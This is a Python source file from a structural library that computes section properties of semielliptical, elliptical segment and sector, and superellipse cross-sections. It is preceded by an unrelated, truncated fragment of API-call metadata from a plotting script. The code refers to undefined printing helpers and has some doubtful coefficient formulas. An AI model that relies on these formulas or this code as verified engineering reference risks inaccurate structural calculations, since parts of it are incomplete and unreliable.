7943), True, 'import pandas as pd\n'), ((8547, 8632), 'utils.plotting.plot_fitted_plane_and_points', 'plotting.plot_fitted_plane_and_points', ([], {'df': 'dfcpid', 'dict_fit_plane': 'dictc_fit_plane'}), '(df=dfcpid, dict_fit_plane=dictc_fit_plane\n )\n', (8584, 8632), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((8640, 8704), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/calibration-coords_fit-plane_raw.png')"], {}), "(path_figs + '/calibration-coords_fit-plane_raw.png')\n", (8651, 8704), True, 'import 
matplotlib.pyplot as plt\n'), ((8717, 8728), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8726, 8728), True, 'import matplotlib.pyplot as plt\n'), ((8760, 8834), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dictc_fit_plane'], {'orient': '"""index"""', 'columns': "['value']"}), "(dictc_fit_plane, orient='index', columns=['value'])\n", (8782, 8834), True, 'import pandas as pd\n'), ((9045, 9120), 'utils.fit.fit_3d_spline', 'fit.fit_3d_spline', ([], {'x': 'dfcpid.x', 'y': 'dfcpid.y', 'z': 'dfcpid[param_zf]', 'kx': 'kx', 'ky': 'ky'}), '(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky)\n', (9062, 9120), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((9336, 9464), 'utils.plotting.scatter_3d_and_spline', 'plotting.scatter_3d_and_spline', (['dfcpid.x', 'dfcpid.y', 'dfcpid[param_zf]', 'bispl_c'], {'cmap': '"""RdBu"""', 'grid_resolution': '(30)', 'view': '"""multi"""'}), "(dfcpid.x, dfcpid.y, dfcpid[param_zf],\n bispl_c, cmap='RdBu', grid_resolution=30, view='multi')\n", (9366, 9464), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((9983, 9994), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9992, 9994), True, 'import matplotlib.pyplot as plt\n'), ((10284, 10320), 'pandas.read_excel', 'pd.read_excel', (['path_test_pid_defocus'], {}), '(path_test_pid_defocus)\n', (10297, 10320), True, 'import pandas as pd\n'), ((10344, 10379), 'pandas.read_excel', 'pd.read_excel', (['path_test_spct_stats'], {}), '(path_test_spct_stats)\n', (10357, 10379), True, 'import pandas as pd\n'), ((10401, 10508), 'utils.modify.merge_calib_pid_defocus_and_correction_coords', 'modify.merge_calib_pid_defocus_and_correction_coords', (['path_calib_coords', 'method'], {'dfs': '[dfcstats, dfcpid]'}), '(path_calib_coords,\n method, dfs=[dfcstats, dfcpid])\n', (10453, 10508), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((10734, 10804), 'os.path.join', 'join', (['path_calib_coords', '"""calib_spct_pid_defocus_stats_calib2_xy.xlsx"""'], {}), "(path_calib_coords, 'calib_spct_pid_defocus_stats_calib2_xy.xlsx')\n", (10738, 10804), False, 'from os.path import join\n'), ((10826, 10863), 'pandas.read_excel', 'pd.read_excel', (['path_calib_pid_defocus'], {}), '(path_calib_pid_defocus)\n', (10839, 10863), True, 'import pandas as pd\n'), ((11445, 11530), 'utils.plotting.plot_fitted_plane_and_points', 'plotting.plot_fitted_plane_and_points', ([], {'df': 'dfcpid', 'dict_fit_plane': 'dictc_fit_plane'}), '(df=dfcpid, dict_fit_plane=dictc_fit_plane\n )\n', (11482, 11530), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((11538, 11595), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/test-coords_fit-plane_raw.png')"], {}), "(path_figs + '/test-coords_fit-plane_raw.png')\n", (11549, 11595), True, 'import matplotlib.pyplot as plt\n'), ((11608, 11619), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11617, 11619), True, 'import matplotlib.pyplot as plt\n'), ((11651, 11725), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dictc_fit_plane'], {'orient': '"""index"""', 'columns': "['value']"}), "(dictc_fit_plane, orient='index', columns=['value'])\n", (11673, 11725), True, 'import pandas as pd\n'), ((11929, 12004), 'utils.fit.fit_3d_spline', 'fit.fit_3d_spline', ([], {'x': 'dfcpid.x', 'y': 'dfcpid.y', 'z': 'dfcpid[param_zf]', 'kx': 'kx', 'ky': 'ky'}), '(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], 
kx=kx, ky=ky)\n', (11946, 12004), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((12220, 12348), 'utils.plotting.scatter_3d_and_spline', 'plotting.scatter_3d_and_spline', (['dfcpid.x', 'dfcpid.y', 'dfcpid[param_zf]', 'bispl_c'], {'cmap': '"""RdBu"""', 'grid_resolution': '(30)', 'view': '"""multi"""'}), "(dfcpid.x, dfcpid.y, dfcpid[param_zf],\n bispl_c, cmap='RdBu', grid_resolution=30, view='multi')\n", (12250, 12348), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((12860, 12871), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12869, 12871), True, 'import matplotlib.pyplot as plt\n'), ((16390, 16436), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/rmse-z_microns.png')"], {}), "(path_figs + '/rmse-z_microns.png')\n", (16401, 16436), True, 'import matplotlib.pyplot as plt\n'), ((16480, 16490), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (16488, 16490), True, 'import matplotlib.pyplot as plt\n'), ((17235, 17263), 'utils.functions.line', 'functions.line', (['z_fit', '*popt'], {}), '(z_fit, *popt)\n', (17249, 17263), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((18252, 18262), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (18260, 18262), True, 'import matplotlib.pyplot as plt\n'), ((22274, 22290), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (22283, 22290), True, 'import matplotlib.pyplot as plt\n'), ((22414, 22428), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (22426, 22428), True, 'import matplotlib.pyplot as plt\n'), ((22724, 22742), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (22740, 22742), True, 'import matplotlib.pyplot as plt\n'), ((22934, 22945), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (22943, 22945), True, 'import matplotlib.pyplot as plt\n'), ((23069, 23119), 'scipy.optimize.curve_fit', 'curve_fit', (['functions.line', 'dfrmse.z_true', 'dfrmse.z'], {}), '(functions.line, dfrmse.z_true, dfrmse.z)\n', (23078, 23119), False, 'from scipy.optimize import curve_fit\n'), ((23468, 23482), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (23480, 23482), True, 'import matplotlib.pyplot as plt\n'), ((24335, 24353), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (24351, 24353), True, 'import matplotlib.pyplot as plt\n'), ((24904, 24915), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (24913, 24915), True, 'import matplotlib.pyplot as plt\n'), ((26174, 26244), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png')"], {}), "(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png')\n", (26185, 26244), True, 'import matplotlib.pyplot as plt\n'), ((26288, 26298), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (26296, 26298), True, 'import matplotlib.pyplot as plt\n'), ((27447, 27520), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png')"], {}), "(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png')\n", (27458, 27520), True, 'import matplotlib.pyplot as plt\n'), ((27564, 27574), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (27572, 27574), True, 'import matplotlib.pyplot as plt\n'), ((4442, 4461), 'numpy.round', 'np.round', (['rmse_c', '(3)'], {}), '(rmse_c, 3)\n', (4450, 4461), True, 'import numpy as np\n'), ((22907, 22917), 
'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (22915, 22917), True, 'import matplotlib.pyplot as plt\n'), ((23740, 23768), 'utils.functions.line', 'functions.line', (['z_fit', '*popt'], {}), '(z_fit, *popt)\n', (23754, 23768), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((24877, 24887), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (24885, 24887), True, 'import matplotlib.pyplot as plt\n'), ((9850, 9869), 'numpy.round', 'np.round', (['rmse_c', '(3)'], {}), '(rmse_c, 3)\n', (9858, 9869), True, 'import numpy as np\n'), ((12734, 12753), 'numpy.round', 'np.round', (['rmse_c', '(3)'], {}), '(rmse_c, 3)\n', (12742, 12753), True, 'import numpy as np\n'), ((17385, 17405), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (17393, 17405), True, 'import numpy as np\n'), ((18021, 18041), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (18029, 18041), True, 'import numpy as np\n'), ((18116, 18136), 'numpy.round', 'np.round', (['popt[1]', '(3)'], {}), '(popt[1], 3)\n', (18124, 18136), True, 'import numpy as np\n'), ((16796, 16832), 'utils.functions.line', 'functions.line', (['dfrmse.z_true', '*popt'], {}), '(dfrmse.z_true, *popt)\n', (16810, 16832), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((23894, 23914), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (23902, 23914), True, 'import numpy as np\n'), ((24622, 24642), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (24630, 24642), True, 'import numpy as np\n'), ((24725, 24745), 'numpy.round', 'np.round', (['popt[1]', '(3)'], {}), '(popt[1], 3)\n', (24733, 24745), True, 'import numpy as np\n'), ((23247, 23283), 'utils.functions.line', 'functions.line', (['dfrmse.z_true', '*popt'], {}), '(dfrmse.z_true, *popt)\n', (23261, 23283), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n')]
|
#
# Copyright (c) 2019-2021 steelpy
#
# Python stdlib imports
import math
import sys
#
# package imports
# (the code below relies on units.*, find_section_dimensions and
#  get_dimension; the print_header / print_properties / print_header_ellipse
#  helpers used by the print_file methods must also be importable here)
import steelpy.units.control as units
from steelpy.sectionproperty.shapes.iomodule import (find_section_dimensions,
                                                     get_dimension)
# ----------------------------------------
# Elliptical Sections Profiles
# ----------------------------------------
#
class HollowSemiellipse:
"""
Calculate the section properties of a Hollow Semiellipse
with constant wall thickness Tw.
    The midthickness perimeter is an ellipse with 0.2 < a/b < 0.50.
Parameters
----------
    d : Section Height
b : Base
tw : Wall thickness
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
    Iy : Second moment of area about major axis
    Zey : Elastic modulus about major axis
    Zpy : Plastic modulus about major axis
    SFy : Shape factor major axis
    ry : Radius of gyration about major Axis
    Iz : Second moment of area about minor axis
    Zez : Elastic modulus about minor axis
    Zpz : Plastic modulus about minor axis
    SFz : Shape factor minor axis
    rz : Radius of gyration about minor Axis
SC : Shear centre
Cw : Warping constant
Notes
----------
Uses formulas from:
    1.- Formulas for stress, strain and structural matrices [W.D. Pilkey]
2.- Roark's formulas for stress and strain [7th Edition]
3.- Wikipedia
Examples
----------
"""
#
def __init__(self):
#
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, **kwargs):
for key, value in kwargs.items():
_dim = find_section_dimensions(key)
get_dimension(self, _dim, value)
self.type = 'Hollow Semiellipse'
#
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
#
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
        self.d *= factors[0]
        # the wall thickness is a length as well; scale it with the same
        # factor so all dimensions stay in consistent units
        self.tw *= factors[0]
        self.b *= factors[0]
#
_a = self.d - 0.50 * self.tw
_b = self.b / 2.0 - 0.50 * self.tw
# Note : there is a limit on the maximum
# wall thickness allowed in this case.
# Cusps will form in the perimeter at
        # the ends of the major axis if this
# maximum is exceeded.
        if _a / _b < 1.0:
            _tmax = 2 * _a**2 / _b
        else:
            _tmax = 2 * _b**2 / _a
if self.tw > _tmax :
sys.exit('error : t > tmax')
#-------------------------------------------------
# Cross-Sectional Area
_C = (_a - _b) / (_a + _b)
_K1 = 0.2464 + 0.002222 * ((_a / _b) + (_b / _a))
_K2 = 1 - 0.3314 * _C + 0.0136 * _C**2 + 0.1097 * _C**3
_K3 = 1 + 0.9929 * _C - 0.2287 * _C**2 - 0.2193 * _C**3
self.area = ((self.tw * math.pi / 2.0) *
(_a + _b) * (1.0 + _K1 * ((_a - _b) / (_a + _b))**2))
# Centroid
self.Zc = ((2.0 * _a * _K2 / math.pi)
+ (self.tw**2 * _K3 / (6.0 * math.pi * _a)))
_Zc1 = _a + self.tw / 2.0 - self.Zc
self.Yc = 0
_Yc1 = _b + self.tw / 2.0
#-------------------------------------------------
# Section Properties
#-------------------------------------------------
        # Second Moment of Area about Major Axis
# --------------------------------------
_K4 = 0.1349 + 0.1279 * (_a / _b) - 0.01284 * (_a / _b)**2
_K5 = 0.1349 + 0.1279 * (_a / _b) - 0.01284 * (_b / _a)**2
_Iy = ((((self.tw * _a**2 * math.pi / 8.0) * (_a + 3 * _b))
* (1 + _K4 * ((_a - _b) / (_a + _b))**2))
+ (((self.tw**3 * math.pi / 32.0) * (3 * _a + _b))
* (1 + _K5 * ((_a - _b) / (_a + _b))**2)))
self.Iy = _Iy - self.area * self.Zc**2
_K2 = 0.1349 + 0.1279 * (_b / _a) - 0.01284 * (_b / _a)**2
_K3 = 0.1349 + 0.1279 * (_a / _b) - 0.01284 * (_a / _b)**2
self.Iz = 0.50 * ((((self.tw * _b**2 * math.pi / 4.0) * (_b + 3 * _a))
* (1 + _K2 * ((_b - _a) / (_b + _a))**2))
+ (((self.tw**3 * math.pi / 16.0) * (3 * _b + _a))
* (1 + _K3 * ((_b - _a) / (_b + _a))**2)))
        # Elastic Modulus about Major Axis
# --------------------------------------
self.Zey = self.Iy / _Zc1
#
self.Zez = self.Iz / _Yc1
        # Plastic Modulus about Major Axis
# --------------------------------------
# Let Zp be the vertical distance from the bottom
# to the plastic neutral axis
_DD = self.tw / _tmax
_DD = max(_DD , 0.20)
_DD = min(_DD , 1.0)
if _a / _b > 0.25 and _a / _b < 1.0:
_C1 = 0.5067 - 0.5588 * _DD + 1.3820 * _DD**2
_C2 = 0.3731 + 0.1938 * _DD - 1.4078 * _DD**2
_C3 = -0.140 + 0.0179 * _DD + 0.4885 * _DD**2
_C4 = 0.0170 - 0.0079 * _DD - 0.0565 * _DD**2
#
_C5 = -0.0292 + 0.3749 * math.sqrt(_DD) + 0.0578 * _DD
_C6 = 0.36740 - 0.8531 * math.sqrt(_DD) + 0.3882 * _DD
_C7 = -0.1218 + 0.3563 * math.sqrt(_DD) - 0.1803 * _DD
_C8 = 0.01540 - 0.0448 * math.sqrt(_DD) + 0.0233 * _DD
#
elif _a / _b >= 1.0 and _a / _b < 4.0:
_C1 = 0.4829 + 0.0725 * _DD - 0.1815 * _DD**2
_C2 = 0.1957 - 0.6608 * _DD + 1.4222 * _DD**2
_C3 = 0.0203 + 1.8999 * _DD - 3.4356 * _DD**2
_C4 = 0.0578 - 1.6666 * _DD + 2.6012 * _DD**2
#
_C5 = 0.22410 - 0.3922 * math.sqrt(_DD) + 0.2960 * _DD
_C6 = -0.6637 + 2.7357 * math.sqrt(_DD) - 2.0482 * _DD
_C7 = 1.52110 - 5.3864 * math.sqrt(_DD) + 3.9286 * _DD
_C8 = -0.8498 + 2.8763 * math.sqrt(_DD) - 1.8874 * _DD
#
else :
sys.exit('error a/b > 4 or a/b < 0.25')
# Plastic neutral axis
_Zp = (_a * (_C1 + _C2 / (_a / _b) + _C3 / (_a / _b)**2
+ _C4 / (_a / _b)**3))
_Yp = 0
        # Plastic section moduli major axis
self.Zpy = (4.0 * _a**2 * self.tw * (_C5 + _C6 / (_a / _b)
+ _C7 / (_a / _b)**2
+ _C8 / (_a / _b)**3))
# Plastic section moduli minor axis
_K4 = 0.1835 + 0.895 * (_b / _a) - 0.00978 * (_b / _a)**2
self.Zpz = (0.50 * (((1.3333 * self.tw * _b * (_b + 2 * _a))
* (1 + _K4 * ((_b - _a) / (_a + _b))**2))
+ (self.tw**3 / 3.0)))
#-------------------------------------------------
# Radius of gyration
self.ry = math.sqrt(self.Iy / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#return self.area, _Zc, _Yc, _Iy, _Zey, _Zpy, _ry, _Iz, _Zez, _Zpz, _rz, _Zp
#
def print_file(self, file_name):
check_out = print_header()
check_out.append("{:23s} {:1.4E} {:1.4E}"
.format(self.type, self.d, self.tw))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
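#
# Minimal usage sketch (hedged): the geometry keyword names and the unit
# string are assumptions about find_section_dimensions / units.find_unit_case,
# and the numeric values are illustrative only.
#
#   hse = HollowSemiellipse()
#   hse.units_input(length='metre')
#   hse.geometry(d=0.300, tw=0.010, b=0.200)
#   hse.get_property()
#   print(hse.area, hse.Iy, hse.Zey, hse.ry)
#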
#
class EllipticalSegment:
"""
Calculate the circular and elliptical segments
cross section properties
Parameters
----------
    a : Major Axis
b : Minor Axis
thetaG : Angle (degrees)
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
    Iy : Second moment of area about major axis
    Zey : Elastic modulus about major axis
    ry : Radius of gyration about major Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
rz : Radius of gyration about minor Axis
Notes
----------
Uses formulas from:
1.- Geometric properties for the design of unusual member
cross-sections in bending [A.J. Sadowski]
Examples
----------
"""
def __init__(self):
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, a, b, thetaG):
#
self.a = float(a)
self.b = float(b)
self.theta = float(thetaG)
self.p = 0
self.q = 0
self.type = 'Elliptical Segment'
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
self.a *= factors[0]
self.b *= factors[0]
self.p *= factors[0]
self.q *= factors[0]
_thetaG = math.radians(self.theta)
_thetaG = min(abs(_thetaG), 0.50 * math.pi)
# Area
self.area = (0.50 * self.a * self.b
* (2 * _thetaG - math.sin( 2 * _thetaG)))
# Centroid
self.Zc = ((4.0 * self.b * math.sin(_thetaG)**3)
/ (3.0 * (2 * _thetaG - math.sin(2 * _thetaG))))
self.Yc = 0
# Second Moment of Area about x
self.Iy = ((self.a * self.b**3 / 16.0)
* (4 * _thetaG - math.sin(4 * _thetaG)))
# Second Moment of Area about y
self.Iz = ((self.a**3 * self.b / 24.0)
* (6.0 * _thetaG - math.sin(2 * _thetaG)
* (3.0 + 2.0 * math.sin(_thetaG)**2)))
# Second Moment of Area about the horizontal centroidal C
self.Ic = self.Iy - self.area * self.Zc**2
# The distances from the centroid to the extreme fibres
_y1 = self.a * math.sin(_thetaG)
_z1 = self.b - self.Zc
_z2 = self.Zc - self.b * math.cos(_thetaG)
# elastic section moduli
self.Zey = min(self.Ic / _z1, self.Ic / _z2)
self.Zez = self.Iz / _y1
# plastic section moduli
_Zpy = 0
_Zpz = 0
# radii of gyration
self.ry = math.sqrt(self.Ic / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#return _Area, _Zc, _Yc, _Iy, _Zey, self.Ic, _ry, _Iz, _Zez, _Zpz, _rz
#
def print_file(self, file_name):
check_out = print_header_ellipse()
check_out.append("{:23s} {:1.4E} {:1.4E} {:1.4E}"
.format(self.type, self.a, self.b, self.theta))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
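#
# Minimal usage sketch (hedged, values illustrative): geometry() takes the
# semi-axes a and b plus the segment half-angle thetaG in degrees.
#
#   seg = EllipticalSegment()
#   seg.units_input(length='metre')
#   seg.geometry(a=0.200, b=0.100, thetaG=60.0)
#   seg.get_property()
#   print(seg.area, seg.Ic, seg.Zey)
#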
#
class EllipticalSector:
"""
Calculate the circular and elliptical sectors
cross section properties
Parameters
----------
    a : Major Axis
b : Minor Axis
thetaG : Angle (degrees)
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
    Iy : Second moment of area about major axis
    Zey : Elastic modulus about major axis
    ry : Radius of gyration about major Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
rz : Radius of gyration about minor Axis
Notes
----------
Uses formulas from:
1.- Geometric properties for the design of unusual member
    cross-sections in bending [A.J. Sadowski]
Examples
----------
"""
def __init__(self):
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, a, b, thetaG):
#
self.a = float(a)
self.b = float(b)
self.theta = float(thetaG)
self.p = 0
self.q = 0
self.type = 'Elliptical Sector'
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
self.a *= factors[0]
self.b *= factors[0]
self.p *= factors[0]
self.q *= factors[0]
_thetaG = math.radians(self.theta)
_thetaG = min(_thetaG, 0.50 * math.pi)
# Area
self.area = self.a * self.b * _thetaG
# Centroid
self.Zc = (2 * self.b * math.sin(_thetaG)) / (3 * _thetaG)
self.Yc = 0
# Second Moment of Area about x
self.Iy = ((self.a * self.b**3 / 8.0)
* (2 * _thetaG + math.sin(2 * _thetaG)))
# Second Moment of Area about y
self.Iz = ((self.a**3 * self.b / 8.0)
* (2 * _thetaG - math.sin(2 * _thetaG)))
# Second Moment of Area about the horizontal centroidal C
self.Ic = self.Iy - self.area * self.Zc**2
# The distances from the centroid to the extreme fibres
_y1 = self.a * math.sin(_thetaG)
_z1 = self.b - self.Zc
_z2 = self.Zc - self.b * math.cos(_thetaG)
# elastic section moduli
self.Zey = min(self.Ic / _z1, self.Ic / _z2)
self.Zez = self.Iz / _y1
# plastic section moduli
_Zpy = 0
_Zpz = 0
# radii of gyration
self.ry = math.sqrt(self.Ic / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#
#return self.area, self.Zc, _Yc, self.Ic, _Zey, _Zpy, _ry, self.Iz, _Zez, _Zpz, _rz
#
def print_file(self, file_name):
check_out = print_header_ellipse()
check_out.append("{:23s} {:1.4E} {:1.4E} {:1.4E}"
.format(self.type, self.a, self.b, self.theta))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
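#
# Minimal usage sketch (hedged, values illustrative): same interface as
# EllipticalSegment, with thetaG the sector half-angle in degrees.
#
#   sec = EllipticalSector()
#   sec.units_input(length='metre')
#   sec.geometry(a=0.200, b=0.100, thetaG=45.0)
#   sec.get_property()
#   print(sec.area, sec.Ic, sec.Zey)
#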
#
class SuperEllipse:
"""
Calculate the superellipse cross section properties
Superellipses as a function of the powers p and q
Parameters
----------
    a : Major Axis
b : Minor Axis
p :
q :
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
    Iy : Second moment of area about major axis
    Zey : Elastic modulus about major axis
    ry : Radius of gyration about major Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
rz : Radius of gyration about minor Axis
Notes
----------
Uses formulas from:
1.- Geometric properties for the design of unusual member
    cross-sections in bending [A.J. Sadowski]
Examples
----------
"""
def __init__(self):
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, a, b, p=2.0, q=2.0):
#
self.a = float(a)
self.b = float(b)
self.theta = 90
self.p = float(p)
self.q = float(q)
self.type = 'Super Ellipse'
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
self.a *= factors[0]
self.b *= factors[0]
        # p and q are dimensionless shape exponents, so they are not
        # rescaled with the length units
if self.p <= 0 or self.q <= 0:
sys.exit("error p & q > 0")
# Area
self.area = ((2.0 * self.a * self.b / self.q) *
((math.gamma(1.0 / self.q) * math.gamma((1.0 + self.p) / self.p))
/ (math.gamma((self.p + self.p * self.q + self.q) / (self.p * self.q)))))
# Centroid
self.Zc = ((math.pow(4, 1.0 / self.q) * self.b / (2 * math.sqrt(math.pi)))
* ((math.gamma((2.0 + self.q) / (2 * self.q))
* math.gamma((self.p + self.p * self.q + self.q) / (self.p * self.q)))
/ (math.gamma((2 * self.p + self.p * self.q + self.q) / (self.p * self.q)))))
self.Yc = 0
# Second Moment of Area about x
self.Iy = ((2.0 * self.a * self.b**3 / self.q) *
((math.gamma(3.0 / self.q) * math.gamma((1.0 + self.p) / self.p))
/ (math.gamma((3 * self.p + self.p * self.q + self.q) / (self.p * self.q)))))
# Second Moment of Area about y
self.Iz = ((2.0 * self.a**3 * self.b / self.p) *
((math.gamma(3.0 / self.p) * math.gamma((1.0 + self.q) / self.q))
/ (math.gamma((self.p + self.p * self.q + 3 * self.q) / (self.p * self.q)))))
